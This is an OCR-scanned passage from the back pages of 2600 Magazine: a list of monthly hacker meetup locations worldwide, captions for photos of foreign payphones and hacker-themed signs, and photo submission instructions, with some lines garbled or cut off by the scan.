Krakow: VRCafe (upstairs), Dolnych 
Mlynow 10. 8 pm 
PORTUGAL 
Lisbon: Amoreiras Shopping, food court 
next to Portugalia. 7 
RUSSIA 
Moscow: RNDM, Nastavnicheskiy 
Pereulok, 13-15 Building 3. 7 pm 
Murmansk: Freshg: me, Rybnyy Proyezd, 
8. 7 pm 
Petrozavodsk: “Good Place” anti-cafe, pr. 
Pervomayskiy, 2. 7 pm 
Saint Petersburg: Krasnosdonskaya 
Ulitsa, 4. 7 pm 
SWEDEN 
Stockholm: Starbucks at Stockholm 
Central Station 
SWITZERLAND 
Lausanne: In front of the MacDo beside 
the train station. 7 pm 
THAILAND 
Bangkok: The Connection Semi 
Center. 6:30 pm 
UNITED KINGDOM 
England 
Leeds: The Brewery Tap Leeds. 7 pm 
London: Trocadero shopping center 
Circus), front entrance on 
try St. 6:30 pm 
Manchester: Bulls Head Pub on London 
Rd. 7:30 pm 
Norwich: Coach and Horses on Thorpe 
Rd. 6 pm 


Scotland 
Edinburgh: Nobles Bar in Leith. 6 pm 
Glasgow: Bon Accord Pub, 153 North 
St. 6 pm 
Wales 
f: Rummer Tavern opposite Ca 
Castle. 
Ewloe: St. David's He 
UNITED STATES 
Alabama 
Auburn: The student lounge upstairs in 
the Foy Union Building. 7 pm 
Arizona 
Phoenix: Changing Hands Bookstore, 300 
W Camelback Rd. 6 pm 
Prescott: Method Coffee, 3180 Willow 
Creek Rd. 6 pm 
Tucson: Barnes & Noble cafe, 5130 E 
Broadway Blvd 
Arkansas 
Fort Smith: Fort Smith Coffee Company 
1101 Rogers Ave. 6 pm 

California 
Anaheim (Fullerton): 23b Shop, 418 
E Commonwealth Ave (behind Pizza 
Hut). 7 pm 
: Idea Fab Labs. 7 pm 
¢ Union Station, 
entrance (Alameda St side) near the Traxx 
Bar. 6 pm 
Monterey: East Village Coffee Lounge. 
5:30 pm 
Petaluma: Starbucks, 125 Petaluma 
Blvd N. 6 pm 
San Diego: Regents Pizza, 4150 Re 
Park Row #170 
San Francisco: 4 Embarcadero Center 
near street level fountains. 6 pm 
San Jose: Outside the ca 
Library at 4th and E San F 
Colorado 
Denver (Lone Tree): Park Meadows 
Food Court. 
Fort Collins: Dazbog Coffee, 2733 
Council Tree Ave. 7 
Delaware 
Newark: Barnes & Noble cafe area, 
Christiana Mall. 

Florida 
Fort Lauderdale: Grit! Col¥@@erdject. 
599 SW Bid Ave. 7 pm 
Gainesville: In the back of the University 
of Florida’s Reitz Union food court. 6 pm 
Jacksonville: Kickbacks Gastropub, 910 
King St. 6:30 pm 
Melbourne: Sun Shoppe Cafe, 540 E New 
Haven Ave. 5:30 pm 
Sebring: Lakeshore Mall food court, next 
to payphones. 6 pm 
Tampa: it Barnes & Noble, 213 N 
Dale Mabry Hwy 
Titusville: Crescent Coffee Company, 311 
S Washington A\ 
Georgia 
Atlanta: Lenox Mall food court. 7 pm 
Hawaii 
Hilo: Prince Kuhio Plaza food court, 111 
East Puainako St 
Idaho 
Boise: BSU Student Union Building, 
upstairs from the main entrance 
Illinois 
Champaign-Urbana: Lincoln Sq 
Mall food court 
Chicago: O'Hare Oasis on 294 behind the 
bank kiosk. 8 pm. 
Peoria: Starbucks, 1200 West Main St 
Indiana 
Bloomington: College Mall food court 
2804 E 3rd St 
Evansville: Barnes & Noble cafe at 624 S 
Green River Rd. 
Indianapolis: The Tomlinson Tap f 
in City Market 
West Lafayette: Jake's Roadhouse, 135 S 
Chauncey Ave 


Iowa 
Ames: Memorial Union Building food 
court at the Iowa State University 
Davenport: Co-Lab, 627 W 2nd St 
Kansas 
Kansas City (Overland Park): Barnes & 
Noble cafe, Oak Park Mall. 
Wichita: Riverside Perk, 1144 Bitting 
Ave 
Louisiana 
New Orleans: Z’otz Coffee House 
Uptown, 8210 Oak St. 6 pm 
Maine 
Portland: Maine Mall by the bench at the 
food court door. 6 pm 
Maryland 
Baltimore: Barnes & Noble cafe at the 
Inner Harbor 
Massachusetts 
Boston (Cambridge): Starbucks, 2nd 
floor, Harvard Square, 1380 Massachusetts 
Ave. 7 pm 
Waltham: The Telephone Museum, 289 
Moody St 


Michigan 
Ann Arbor: Starbucks in The Galleria on 
S University. 7 pm 


Minnesota 
Bloomington: Mall of America food court 
in front of Burger King. 6 pm 
Missouri 
St. Louis: Arch Reactor Hacker Space, 
2215 Scott Ave. 6 pm 
Montana 
Helena: Hall beside OX at Lundy Center 
Nebraska 
Omaha: Westroads Mall food court near 
south entrance, 100th and Dodge. 7 pm 
Nevada 
Elko: Uber Games and Technology, 1071 
Idaho St. 6 pm 
Las Vegas (Henderson): SYN Shop, 1075 
American Pacific Dr Suite C. 6 pm 
Reno: Barnes & Noble Starbucks 5555 
S. Virginia St 
New Hampshire 
Keene: Local Burger, 82 Main St. 7 pm 
New Jersey 
Somerville: Dragonfly Cafe, 14 E Main St. 


New York 
Albany: Starbucks, 1244 Wester 
Ave. 6 pm 
New York: The Atrium at 875, 53rd St & 
3rd Ave, lower level 
Rochester: Interlock Rochester, 115 E 
Main St, Door #7, Suite 200. 7 pm 
Syracuse: Secure Network Techn 
247 W Fayette St, 2nd floor 
North Carolina 
Charlotte: Panera Bread, 9321 JW Clay 
Blvd (near UNC Charlotte). 6:30 pm 
Greensboro: Caribou Coffee, 3109 
Northline Ave (Friendly Center). 
Raleigh: Morning Times, 1a Haxgett 
Syghpm 
North Dakota 
Fargo: West Acres Mall food court. 
Ohio 
Cincinnati: Hive13, 2939 Spring Grove 
AW] pm 
ensville Heights): 
Panera Bread, 4103 Richmond Rd. 
Columbus: Front of the food court 
fountain in Easton Mall. 7 pm 
Dayton: Marions Piazza ver. 2.0, 8991 
Kingsridge Dr, behind the Dayton Mall 
off SR-741 
Toledo: SIP Coffee, Cricket West shopping 
center, 2nd floor, 
Youngstown (Niles): Panera Bread, 5675 
Youngstown Warren Rd 
Oklahoma 
Oklahoma City: Cafe Bella, southeast 
corner of SW 89th St and Penn 
Oregon 
Portland: Theo's, 121 NW 5th Ave 
Pennsylvania 
Allentown: Panera Bread, 3100 W 
Tilghman St. 6 pm 
nera Bread, 4263 Union 
side Taco Bell. 6 pm 
Pittsburgh: Tazz D'Oro, 1125 North 
Highland Ave at round table by front 
window 
State College: Big Bowl Noodle House 
418 E College Ave 
Puerto Rico 
San Juan: Plaza Las Ameri 
1st floor. 
Trujillo Alto: The Office Irish Pub. 
7:30 pm 


South Carolina 
Myrtle Beach: SubProto, 3926 Wesley 
St, Suite 403. 
South Dakota 
Sioux Falls: Empire Mall, by Burger King 
Tennessee 
Knoxville: West Town Mall food court. 
6 pm 
Nashville: Nashville Software School, 301 
Plus Park Blvd #300. 6 pm 
Texas 
Addison: Dunn Brothers Coffee, 3725 
Belt Line Rd 
Austin: Whole Foods mezzanine level 
525 N Lamar Blvd. 7 pm 
Dallas: Wild Turkey, 2470 Walnut Hill 
Ln. 7 pm 
Houston: Ninfa’s Express seating area, 
ia 1V. 6 pm 
Plano: Fourteen Eighteen Coffeehouse, 
418 Ave K. 6 pm 
Vermont 
Burlington: The Burlington Town Center 
Mall food court undet 
Virginia 
Blacksburg: Squires Student Center at 
Virginia Tech, 118 N. Main St. 7 pm 
Charlottesville: Panera Bread at the 
Barracks Road shopping center. 6:30 pm 
Lexington: Collaboratory, 18 East Nelson 
St, #103. 6 pm 
Reston: Refraction, 11911 Freedom Dr 
8th Fl. 7 pm 
Richmond: Hack.RVA 1600 Roseneath 
Rd. 6 pm 
Washington 
Seattle: Cafe Allegro, upstairs, 4214 
University Way NE (alley entrance). 6 pm 
Spokane: Starbucks, 4727 N Division 
Tacoma: Tacoma Mall food court. 6 pm 
Wenatchee: Badger Mountain Brewing, 
1 Orondo Ave. 


Wisconsin 
Madison: Fair Trade Coffee House, 418 
State St 


URUGUAY 
Montevideo: MAM Mercado Aj Montevideo, Jose L.1 
20, Choperia Mastra. 7 pm 


All meetings take place on the first 
Friday of the month (a * indicates a 
meeting that’s held on the first Thursday 
of the month). Unless otherwise noted, 
2600 meetings begin at 5 pm local time. 
To start a meeting in your city, send 
email to meetings@2600.com. 


Follow @2600Meetings on Twitter 
and let us know your meeting's 
Twitter handle! 


2600 Magazine 


Exotic Payphones 


Seychelles. Spotted in Beau Vallon and operated 
by Alittel, one of two cellular providers. Sadly, this 
phone has been vandalized, is no longer maintained, 
and doesn’t work. 


This standard model has been ind since 
the 1980s and was found in Talknafjérdur, a town in 
the northwest of about 250 people. 


Photo by Babu Mengelepouti Photo by Adalsteinn 


Hong Kong. This phone is under cover, which is 
how it’s stayed in such great condition. If you look 
carefully, you'll see that the old “999” emergency 
dialing code is still in use from the British colonial 
days. 


Malaysia. Here are a couple of completely different 
and colorful types of payphones living in peace and 
harmony by the water, encountered on the island of 
Noman 


Photo by Wreckage Brother Photo by Jon Whitton 


Visit www.2600.com/payphones to see our foreign payphone photos! 
(Or turn to the inside front cover to see more right now.) 


The Back Cover Photos 


There’s quite a story behind this 
sign, discovered by Jon Guidry in 
the Perimeter Mall in Dunwoody, 
Georgia. We all know a 404 error 
means a page on the web isn’t 
able to be found. But this was 
actually a reference to nearby 
Atlanta’s area code (which used 
to cover the entire state). Sadly 
enough though, since this picture 
was taken, this branch has closed - 
meaning it’s not able to be found. 
And so the irony completes. 


We’ll just say it now. We want 
this banner. We’ll even wear 
all the protective equipment 
it’s telling us to whenever we 
engage in hacking if we can 
just have it to proudly hang 
somewhere. This was found 
by Wreckage Brother at 
the Pasar Seni MRT station 
in Kuala Lumpur, Malaysia. 
We suspect this wasn’t in 
fact some sort of crude pen 
testing operation, but rather a 
drilling/construction project. 

[Banner text: HACKING ACTIVITY. MANDATORY PERSONAL PROTECTIVE EQUIPMENT MUST BE WORN AT ALL TIME] 


If you’ve spotted something that has “2600” in it or anything else of interest to the hacker 
world (such as funny uses of “hacker,” “unix,” “404,” you get the idea...), take a picture and 
send it on in! Be sure to use the highest quality settings on your camera to increase the odds 
of it getting printed. Make sure and tell us where you spotted your subject along with any 
other info that makes it interesting - many photos are eliminated due to lack of detail. 


Email your submissions to articles@2600.com or use snail mail to 
2600 Editorial Dept., PO Box 99, Middle Island, NY 11953 USA. 


If we use your picture, you’ll get a free one-year subscription 
(or back issues) and a 2600 t-shirt of your choice. 


